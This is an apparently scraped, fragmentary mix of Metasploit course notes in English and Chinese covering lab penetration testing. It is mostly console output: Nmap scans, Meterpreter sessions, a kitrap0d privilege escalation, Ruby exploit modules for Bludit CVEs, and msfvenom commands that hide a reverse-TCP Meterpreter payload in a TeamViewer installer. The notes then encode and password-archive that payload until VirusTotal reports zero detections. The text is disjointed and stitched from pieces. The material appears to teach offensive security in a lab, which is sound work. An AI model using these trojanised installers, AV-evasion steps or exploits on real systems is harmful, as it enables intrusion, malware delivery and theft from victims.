[*] Using API key: <API key> [*] Please wait while I upload TeamViewerInstall.exe... [*] VirusTotal: Scan request successfully queued, come back later for the report [*] Sample MD5 hash : 4f54cc46e2f55be168cc6114b74a3130 [*] Sample SHA1 hash : 53fcb4ed92cf40247782de41877b178ef2a9c5a9 [*] Sample SHA256 hash : 66894cbecf2d9a31220ef811a2ba65c06fdfecddbc729d006fdab10e43368da8 [*] Analysis link: https://www.virustotal.com/gui/file/<SNIP>/detection/f-<SNIP>-1651750343 [*] Requesting the report... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Analysis Report: TeamViewerInstall.exe (51 / 68): 66894cbecf2d9a31220ef811a2ba65c06fdfecddbc729d006fdab10e43368da8 ==================================================================================================================
Command Description ------- ----------- db_connect Connect to an existing database db_disconnect Disconnect from the current database instance db_export Export a file containing the contents of the database db_import Import a scan result file (filetype will be auto-detected) db_nmap Executes nmap and records the output automatically db_rebuild_cache Rebuilds the database-stored module cache db_status Show the current database status hosts List all hosts in the database loot List all loot in the database notes List all notes in the database services List all services in the database vulns List all vulnerabilities in the database workspace Switch between database workspaces
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
Usage: workspace List workspaces workspace -v List workspaces verbosely workspace [name] Switch workspace workspace -a [name] ... Add workspace(s) workspace -d [name] ... Delete workspace(s) workspace -D Delete all workspaces workspace -r Rename workspace workspace -h Show this help information
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 20:54 UTC Nmap scan report for 10.10.10.40 Host is up (0.017s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.81 seconds
[*] Importing 'Nmap XML' data [*] Import: Parsing with 'Nokogiri v1.10.9' [*] Importing host 10.10.10.40 [*] Successfully imported ~/Target.xml
msf6 > hosts
Hosts =====
address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 10.10.10.40 Unknown device
msf6 > services
Services ========
host port proto name state info ---- ---- ----- ---- ----- ---- 10.10.10.40 135 tcp msrpc open Microsoft Windows RPC 10.10.10.40 139 tcp netbios-ssn open Microsoft Windows netbios-ssn 10.10.10.40 445 tcp microsoft-ds open Microsoft Windows 7 - 10 microsoft-ds workgroup: WORKGROUP 10.10.10.40 49152 tcp msrpc open Microsoft Windows RPC 10.10.10.40 49153 tcp msrpc open Microsoft Windows RPC 10.10.10.40 49154 tcp msrpc open Microsoft Windows RPC 10.10.10.40 49155 tcp msrpc open Microsoft Windows RPC 10.10.10.40 49156 tcp msrpc open Microsoft Windows RPC 10.10.10.40 49157 tcp msrpc open Microsoft Windows RPC
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 21:04 UTC [*] Nmap: Nmap scan report for 10.10.10.8 [*] Nmap: Host is up (0.016s latency). [*] Nmap: Not shown: 999 filtered ports [*] Nmap: PORT STATE SERVICE VERSION [*] Nmap: 80/TCP open http HttpFileServer httpd 2.3 [*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows [*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 11.12 seconds
msf6 > hosts
Hosts =====
address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 10.10.10.8 Unknown device 10.10.10.40 Unknown device
msf6 > services
Services ========
host port proto name state info ---- ---- ----- ---- ----- ---- 10.10.10.8 80 tcp http open HttpFileServer httpd 2.3 10.10.10.40 135 tcp msrpc open Microsoft Windows RPC 10.10.10.40 139 tcp netbios-ssn open Microsoft Windows netbios-ssn 10.10.10.40 445 tcp microsoft-ds open Microsoft Windows 7 - 10 microsoft-ds workgroup: WORKGROUP 10.10.10.40 49152 tcp msrpc open Microsoft Windows RPC 10.10.10.40 49153 tcp msrpc open Microsoft Windows RPC 10.10.10.40 49154 tcp msrpc open Microsoft Windows RPC 10.10.10.40 49155 tcp msrpc open Microsoft Windows RPC 10.10.10.40 49156 tcp msrpc open Microsoft Windows RPC 10.10.10.40 49157 tcp msrpc open Microsoft Windows RPC
OPTIONS: -a,--add Add the hosts instead of searching -d,--delete Delete the hosts instead of searching -c <col1,col2> Only show the given columns (see list below) -C <col1,col2> Only show the given columns until the next restart (see list below) -h,--help Show this help information -u,--up Only show hosts which are up -o <file> Send output to a file in CSV format -O <column> Order rows by specified column number -R,--rhosts Set RHOSTS from the results of the search -S,--search Search string to filter by -i,--info Change the info of a host -n,--name Change the name of a host -m,--comment Change the comment of a host -t,--tag Add or specify a tag to a range of hosts
-a,--add Add the services instead of searching -d,--delete Delete the services instead of searching -c <col1,col2> Only show the given columns -h,--help Show this help information -s <name> Name of the service to add -p <port> Search for a list of ports -r <protocol> Protocol type of the service being added [tcp|udp] -u,--up Only show services which are up -o <file> Send output to a file in csv format -O <column> Order rows by specified column number -R,--rhosts Set RHOSTS from the results of the search -S,--search Search string to filter by -U,--update Update data for existing service
Available columns: created_at, info, name, port, proto, state, updated_at
Usage - Adding credentials: creds add uses the following named parameters. user : Public, usually a username password : Private, private_type Password. ntlm : Private, private_type NTLM Hash. Postgres : Private, private_type Postgres MD5 ssh-key : Private, private_type SSH key, must be a file path. hash : Private, private_type Nonreplayable hash jtr : Private, private_type John the Ripper hash type. realm : Realm, realm-type: Realm, realm_type (domain db2db sid pgdb rsync wildcard), defaults to domain.
Examples: Adding # Add a user, password and realm creds add user:admin password:notpassword realm:workgroup # Add a user and password creds add user:guest password:'guest password' # Add a password creds add password:'password without username' # Add a user with an NTLMHash creds add user:admin ntlm:E2FC15074BF7751DD408E6B105741864:A1074A69B1BDE45403AB680504BBDD1A # Add a NTLMHash creds add ntlm:E2FC15074BF7751DD408E6B105741864:A1074A69B1BDE45403AB680504BBDD1A # Add a Postgres MD5 creds add user:postgres postgres:md5be86a79bf2043622d58d5453c47d4860 # Add a user with an SSH key creds add user:sshadmin ssh-key:/path/to/id_rsa # Add a user and a NonReplayableHash creds add user:other hash:d19c32489b870735b5f587d76b934283 jtr:md5 # Add a NonReplayableHash creds add hash:d19c32489b870735b5f587d76b934283
General options -h,--help Show this help information -o <file> Send output to a file in csv/jtr (john the ripper) format. If the file name ends in '.jtr', that format will be used. If file name ends in '.hcat', the hashcat format will be used. CSV by default. -d,--delete Delete one or more credentials
Filter options for listing -P,--password <text> List passwords that match this text -p,--port <portspec> List creds with logins on services matching this port spec -s <svc names> List creds matching comma-separated service names -u,--user <text> List users that match this text -t,--type <type> List creds that match the following types: password,ntlm,hash -O,--origins <IP> List creds that match these origins -R,--rhosts Set RHOSTS from the results of the search -v,--verbose Don't truncate long password hashes
Examples, listing: creds # Default, returns all credentials creds 1.2.3.4/24 # Return credentials with logins in this range creds -O 1.2.3.4/24 # Return credentials with origins in this range creds -p 22-25,445 # nmap port specification creds -s ssh,smb # All creds associated with a login on SSH or SMB services creds -t NTLM # All NTLM creds creds -j md5 # All John the Ripper hash type MD5 creds
Example, deleting: # Delete all SMB credentials creds -d -s smb
-a,--add Add loot to the list of addresses, instead of listing -d,--delete Delete *all* loot matching host and type -f,--file File with contents of the loot to add -i,--info Info of the loot to add -t <type1,type2> Search for a list of types -h,--help Show this help information -S,--search Search string to filter by
插件的使用使渗透测试人员的生活更加轻松,将知名软件的功能带入msfconsoleMetasploit Pro 环境。以前,我们需要在不同的软件之间循环导入和导出结果,一遍又一遍地设置选项和参数,现在,通过使用插件,msfconsole 会自动将所有内容记录到我们正在使用的数据库以及主机、服务和漏洞一目了然供用户使用。插件直接与 API 一起工作,可用于操作整个框架。它们可用于自动执行重复性任务、向 中添加新命令msfconsole以及扩展已经很强大的框架。
[*] Nessus Bridge for Metasploit [*] Type nessus_help for a command listing [*] Successfully loaded Plugin: Nessus
msf6 > nessus_help
Command Help Text ------- --------- Generic Commands ----------------- ----------------- nessus_connect Connect to a Nessus server nessus_logout Logout from the Nessus server nessus_login Login into the connected Nessus server with a different username and
<SNIP>
nessus_user_del Delete a Nessus User nessus_user_passwd Change Nessus Users Password Policy Commands ----------------- ----------------- nessus_policy_list List all polciies nessus_policy_del Delete a policy
如果插件安装不正确,我们将在尝试加载时收到以下错误。
MSF - 加载 Nessus
1 2 3
msf6 > load Plugin_That_Does_Not_Exist
[-] Failed to load plugin from /usr/share/metasploit-framework/plugins/Plugin_That_Does_Not_Exist.rb: cannot load such file -- /usr/share/metasploit-framework/plugins/Plugin_That_Does_Not_Exist.rb
Command Description ------- ----------- check_footprint Checks the possible footprint of a post module on a target system.
auto_exploit Commands =====================
Command Description ------- ----------- show_client_side Show matched client side exploits from data imported from vuln scanners. vuln_exploit Runs exploits based on data imported from vuln scanners.
Discovery Commands ==================
Command Description ------- ----------- discover_db Run discovery modules against current hosts in the database. network_discover Performs a port-scan and enumeration of services found for non pivot networks. pivot_network_discover Performs enumeration of networks available to a specified Meterpreter session. show_session_networks Enumerate the networks one could pivot thru Meterpreter in the active sessions.
Project Commands ================
Command Description ------- ----------- project Command for managing projects.
Postauto Commands =================
Command Description ------- ----------- app_creds Run application password collection modules against specified sessions. get_lhost List local IP addresses that can be used for LHOST. multi_cmd Run shell command against several sessions multi_meter_cmd Run a Meterpreter Console Command against specified sessions. multi_meter_cmd_rc Run resource file with Meterpreter Console Commands against specified sessions. multi_post Run a post module against specified sessions. multi_post_rc Run resource file with post modules and options against specified sessions. sys_creds Run system password collection modules against specified sessions.
Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ MS01 10.10.10.129:443 -> 10.10.10.205:50501 (10.10.10.205)
msf6 exploit(multi/handler) > jobs -h Usage: jobs [options]
Active job manipulation and interaction.
OPTIONS:
-K Terminate all running jobs. -P Persist all running jobs on restart. -S <opt> Row search filter. -h Help banner. -i <opt> Lists detailed information about a running job. -k <opt> Terminate jobs by job ID and/or range. -l List all running jobs. -p <opt> Add persistence to job by job ID -v Print more detailed info. Use with -i and -l
-J Force running in the foreground, even if passive. -e <opt> The payload encoder to use. If none is specified, ENCODER is used. -f Force the exploit to run regardless of the value of MinimumRank. -h Help banner. -j Run in the context of a job. <SNIP
将漏洞作为后台作业运行
将漏洞作为后台作业运行
1 2 3 4 5
msf6 exploit(multi/handler) > exploit -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.34:4444
Command Description ------- ----------- ? Help menu background Backgrounds the current session bg Alias for background bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session get_timeouts Get the current session timeout values guid Get the session GUID help Help menu info Displays information about a Post module irb Open an interactive Ruby shell on the current session load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session migrate Migrate the server to another process pivot Manage pivot listeners pry Open the Pry debugger on the current session quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module secure (Re)Negotiate TLV packet encryption on the session sessions Quickly switch to another session set_timeouts Set the current session timeout values sleep Force Meterpreter to go quiet, then re-establish session. transport Change the current transport mechanism use Deprecated alias for "load" uuid Get the UUID for the current session write Writes data to a channel
Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The HTTP password to specify for authentication HttpUsername no The HTTP username to specify for authentication METHOD move yes Move or copy the file on the remote system from .txt -> .asp (Accepted: move, copy) PATH /metasploit%RAND%.asp yes The path to attempt to upload Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.239.181 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
1712 396 alg.exe 1836 592 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe 1920 396 dllhost.exe 2232 3552 svchost.exe x86 0 C:\WINDOWS\Temp\rad9E519.tmp\svchost.exe 2312 592 wmiprvse.exe 3552 1460 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe 3624 592 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe 4076 1080 cidaemon.exe
meterpreter > steal_token 1836
Stolen token with username: NT AUTHORITY\NETWORK SERVICE
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
msf6 exploit(windows/iis/iis_webdav_upload_asp) > use 0 msf6 post(multi/recon/local_exploit_suggester) > show options
Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.15 - Collecting local exploits for x86/windows... [*] 10.10.10.15 - 34 exploit checks are being tried... nil versions are discouraged and will be deprecated in Rubygems 4 [+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed msf6 post(multi/recon/local_exploit_suggester) >
Name Current Setting Required Description ---- --------------- -------- ----------- PASS guest yes The password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections URI /nagios3/cgi-bin/statuswml.cgi yes The full URI path to statuswml.cgi USER guest yes The username to authenticate with VHOST no HTTP server virtual host
definitialize(info={}) super(update_info(info, 'Name' => "Bludit Directory Traversal Image File Upload Vulnerability", 'Description' => %q{ This module exploits a vulnerability in Bludit. A remote user could abuse the uuid parameter in the image upload feature in order to save a malicious payload anywhere onto the server, and then use a custom .htaccess file to bypass the file extension check to finally get remote code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'christasa', # Original discovery 'sinn3r'# Metasploit module ], 'References' => [ ['CVE', '2019-16113'], ['URL', 'https://github.com/bludit/bludit/issues/1081'], ['URL', 'https://github.com/bludit/bludit/commit/a9640ff6b5f2c0fa770ad7758daf24fec6fbf3f5#diff-6f5ea518e6fc98fb4c16830bbf9f5dac' ] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Notes' => { 'SideEffects' => [ IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ] }, 'Targets' => [ [ 'Bludit v3.9.2', {} ] ], 'Privileged' => false, 'DisclosureDate' => "2019-09-07", 'DefaultTarget' => 0))
一般标识信息填好后,我们就可以转到options菜单变量了:
概念验证 - 功能
代号:红宝石
1 2 3 4 5 6 7
register_options( [ OptString.new('TARGETURI', [true, 'The base path for Bludit', '/']), OptString.new('BLUDITUSER', [true, 'The username for Bludit']), OptString.new('BLUDITPASS', [true, 'The password for Bludit']) ]) end
includeMsf::Exploit::Remote::HttpClient includeMsf::Exploit::PhpEXE includeMsf::Auxiliary::Report definitialize(info={}) super(update_info(info, 'Name' => "Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass", 'Description' => %q{ Versions prior to and including 3.9.2 of the Bludit CMS are vulnerable to a bypass of the anti-brute force mechanism that is in place to block users that have attempted to login incorrectly ten times or more. Within the bl-kernel/security.class.php file, a function named getUserIp attempts to determine the valid IP address of the end-user by trusting the X-Forwarded-For and Client-IP HTTP headers. }, 'License' => MSF_LICENSE, 'Author' => [ 'rastating', # Original discovery '0ne-nine9'# Metasploit module ], 'References' => [ ['CVE', '2019-17240'], ['URL', 'https://rastating.github.io/bludit-brute-force-mitigation-bypass/'], ['PATCH', 'https://github.com/bludit/bludit/pull/1090' ] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Notes' => { 'SideEffects' => [ IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ] }, 'Targets' => [ [ 'Bludit v3.9.2', {} ] ], 'Privileged' => false, 'DisclosureDate' => "2019-10-05", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path for Bludit', '/']), OptString.new('BLUDITUSER', [true, 'The username for Bludit']), OptPath.new('PASSWORDS', [ true, 'The list of passwords', File.join(Msf::Config.data_directory, "wordlists", "passwords.txt") ]) ]) end # -- Exploit code -- # # dirty workaround to remove this warning: # Cookie#domain returns dot-less domain name now. Use Cookie#dot_domain if you need "." at the beginning. # see https://github.com/nahi/httpclient/issues/252 classWebAgent classCookie < HTTP::Cookie defdomain self.original_domain end end end
defget_csrf(client, login_url) res = client.get(login_url) csrf_token = /input.+?name="tokenCSRF".+?value="(.+?)"/.match(res.body).captures[0] end
defauth_ok?(res) HTTP::Status.redirect?(res.code) && %r{/admin/dashboard}.match?(res.headers['Location']) end
如今,这两个组合工具为渗透测试人员提供了一种方法,可以为不同的目标主机架构和版本快速制作有效载荷,同时有可能“清理”他们的 shellcode,以便在部署时不会遇到任何错误。如今,AV 规避部分要复杂得多,因为仅基于签名的恶意文件分析已成为过去。Heuristic analysis, machine learning, and deep packet inspection使有效负载更难通过编码方案的几个后续迭代来逃避任何好的 AV 软件。如模块中所示Payloads,提交具有上述相同配置的简单有效载荷产生的命中率为52/65. 就全球恶意软件分析师而言,这就是宾果游戏。(全世界的恶意软件分析师是否真的说“那是宾果游戏”,这一点仍未得到证实。)
创建我们的有效载荷
假设我们发现了一个开放的 FTP 端口,该端口要么凭据薄弱,要么意外地对匿名登录开放。现在,假设 FTP 服务器本身链接到在tcp/80同一台机器的端口上运行的 Web 服务,并且可以在 Web 服务的目录中查看 FTP 根目录中找到的所有文件/uploads。我们还假设 Web 服务没有任何检查允许我们作为客户端在其上运行的内容。
假设我们被允许从 Web 服务中调用任何我们想要的东西。在这种情况下,我们可以直接通过 FTP 服务器上传 PHP shell 并从 Web 访问它,触发有效载荷并允许我们从受害机器接收反向 TCP 连接。
扫描目标
扫描目标
1 2 3 4 5 6 7
vnswer77@htb[/htb]$ nmap -sV -T4 -p- 10.10.10.5
<SNIP> PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 80/tcp open http Microsoft IIS httpd 7.5 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 341 bytes Final size of aspx file: 2819 bytes
<...SNIP...> 2375 post/multi/manage/screenshare normal No Multi Manage the screen of the target meterpreter session 2376 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester 2377 post/osx/gather/apfs_encrypted_volume_passwd 2018-03-21 normal Yes Mac OS X APFS Encrypted Volume Password Disclosure
<SNIP>
msf6 exploit(multi/handler) > use 2376 msf6 post(multi/recon/local_exploit_suggester) > show options
Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows... [*] 10.10.10.5 - 31 exploit checks are being tried... [+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/local/ms10_015_kitrap0d 2010-01-19 great Yes Windows SYSTEM Escalation via KiTrap0D
msf6 exploit(multi/handler) > use 0 msf6 exploit(windows/local/ms10_015_kitrap0d) > show options
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST tun0 yes The listen address (an interface may be specified) LPORT 1338 yes The listen port
Exploit target:
Id Name -- ---- 0 Windows 2K SP4 - Windows 7 (x86)
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LPORT 1338
LPORT => 1338
msf6 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 3
SESSION => 3
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.5:1338 [*] Launching notepad to host the exploit... [+] Process 3552 launched. [*] Reflectively injecting the exploit DLL into 3552... [*] Injecting exploit into 3552 ... [*] Exploit injected. Injecting payload into 3552... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (176195 bytes) to 10.10.10.5 [*] Meterpreter session 4 opened (10.10.14.5:1338 -> 10.10.10.5:49162) at 2020-08-28 17:15:56 +0000
vnswer77@htb[/htb]$ msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5
Attempting to read payload from STDIN... Found 1 compatible encoders Attempting to encode payload with 5 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 27 (iteration=0) x86/shikata_ga_nai succeeded with size 54 (iteration=1) x86/shikata_ga_nai succeeded with size 81 (iteration=2) x86/shikata_ga_nai succeeded with size 108 (iteration=3) x86/shikata_ga_nai succeeded with size 135 (iteration=4) x86/shikata_ga_nai chosen with final size 135 Payload size: 135 bytes Saved as: /home/user/Desktop/TeamViewer_Setup.exe
存档文件、文件夹、脚本、可执行文件、图片或文档等信息并在存档上放置密码可绕过当今许多常见的反病毒签名。但是,此过程的缺点是它们将作为通知在 AV 警报仪表板中提出,因为由于被密码锁定而无法扫描。管理员可以选择手动检查这些档案以确定它们是否是恶意的。
生成有效载荷
生成有效载荷
1 2 3 4 5 6 7 8 9 10 11 12 13
vnswer77@htb[/htb]$ msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 5
Attempting to read payload from STDIN... Found 1 compatible encoders Attempting to encode payload with 5 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 27 (iteration=0) x86/shikata_ga_nai succeeded with size 54 (iteration=1) x86/shikata_ga_nai succeeded with size 81 (iteration=2) x86/shikata_ga_nai succeeded with size 108 (iteration=3) x86/shikata_ga_nai succeeded with size 135 (iteration=4) x86/shikata_ga_nai chosen with final size 135 Payload size: 135 bytes Saved as: /home/user/test.js
[*] WARNING: When you upload or otherwise submit content, you give VirusTotal [*] (and those we work with) a worldwide, royalty free, irrevocable and transferable [*] licence to use, edit, host, store, reproduce, modify, create derivative works, [*] communicate, publish, publicly perform, publicly display and distribute such [*] content. To read the complete Terms of Service for VirusTotal, please go to the [*] following link: [*] https://www.virustotal.com/en/about/terms-of-service/ [*] [*] If you prefer your own API key, you may obtain one at VirusTotal.
[*] Enter 'Y' to acknowledge: Y
[*] Using API key: <API key> [*] Please wait while I upload test.js... [*] VirusTotal: Scan request successfully queued, come back later for the report [*] Sample MD5 hash : 35e7687f0793dc3e048d557feeaf615a [*] Sample SHA1 hash : f2f1c4051d8e71df0741b40e4d91622c4fd27309 [*] Sample SHA256 hash : 08799c1b83de42ed43d86247ebb21cca95b100f6a45644e99b339422b7b44105 [*] Analysis link: https://www.virustotal.com/gui/file/<SNIP>/detection/f-<SNIP>-1652167047 [*] Requesting the report... [*] Received code 0. Waiting for another 60 seconds... [*] Analysis Report: test.js (11 / 59): <...SNIP...> ====================================================================================================
[*] Using API key: <API key> [*] Please wait while I upload test2... [*] VirusTotal: Scan request successfully queued, come back later for the report [*] Sample MD5 hash : 2f25eeeea28f737917e59177be61be6d [*] Sample SHA1 hash : c31d7f02cfadd87c430c2eadf77f287db4701429 [*] Sample SHA256 hash : 76ec64197aa2ac203a5faa303db94f530802462e37b6e1128377315a93d1c2ad [*] Analysis link: https://www.virustotal.com/gui/file/<SNIP>/detection/f-<SNIP>-1652167804 [*] Requesting the report... [*] Received code 0. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Analysis Report: test2 (0 / 49): 76ec64197aa2ac203a5faa303db94f530802462e37b6e1128377315a93d1c2ad =================================================================================================
